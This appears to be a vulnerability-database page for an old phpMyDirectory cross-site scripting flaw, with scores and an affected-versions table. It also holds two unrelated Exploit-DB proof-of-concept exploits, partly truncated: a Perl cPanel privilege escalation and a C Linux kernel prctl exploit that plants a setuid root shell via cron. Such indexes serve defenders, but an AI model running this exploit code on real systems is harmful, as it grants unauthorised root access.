CVE-2006-4755
published 2006-09-13CVE-2006-4755: Cross-site scripting (XSS) vulnerability in alpha.php in phpMyDirectory 10.4.6 and earlier allows remote attackers to inject arbitrary web script or HTML via…
PriorityP412medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EPSS
0.92%
55.9th percentile
Cross-site scripting (XSS) vulnerability in alpha.php in phpMyDirectory 10.4.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the letter parameter. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Affected
34 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| accomplishtechnology | phpmydirectory | <= 10.4.6 | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
| accomplishtechnology | phpmydirectory | — | — |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
cPanel 10.8.x - cpwrap via MySQLAdmin Privilege Escalation
exploitdb·2006-10-01
CVE-2006-5014 cPanel 10.8.x - cpwrap via MySQLAdmin Privilege Escalation
cPanel 10.8.x - cpwrap via MySQLAdmin Privilege Escalation
---
#!/usr/bin/perl -w
# 10/01/06 - cPanel ) {
if(/REMOTE_USER/) { die "$cpwrap is patched.\n"; }
}
close (CPWRAP);
open (STRICT, ">strict.pm") or die "Can't open strict.pm: $!\n";
print STRICT "\$e = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"/bin/bash\\\\\\\");}\";\n";
print STRICT "system(\"/bin/echo -n \\\"\$e\\\">Maildir.c\");\n";
print STRICT "system(\"/usr/bin/gcc Maildir.c -o Maildir\");\n";
print STRICT "system(\"/bin/chmod 4755 Maildir\");\n";
print STRICT "system(\"/bin/rm -f Maildir.c strict.pm\");\n";
close (STRICT);
system("$mysqlwrap DUMPMYSQL 2>/dev/null");
if ( -e "Maildir" ) {
system("./Maildir");
}
else {
unlink "strict.pm";
die "Failed\n";
}
# milw0rm.com [2006-10-01]
Exploit-DB
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (1)
exploitdb·2006-07-11·CVSS 4.6
CVE-2006-2451 [MEDIUM] Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (1)
Linux Kernel 2.6.13 = 2.6.13 && (main PoC code) */
/* - RoMaNSoFt (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n");
if ( !( child = fork()
No writeups or analysis indexed.
2006-09-13
Published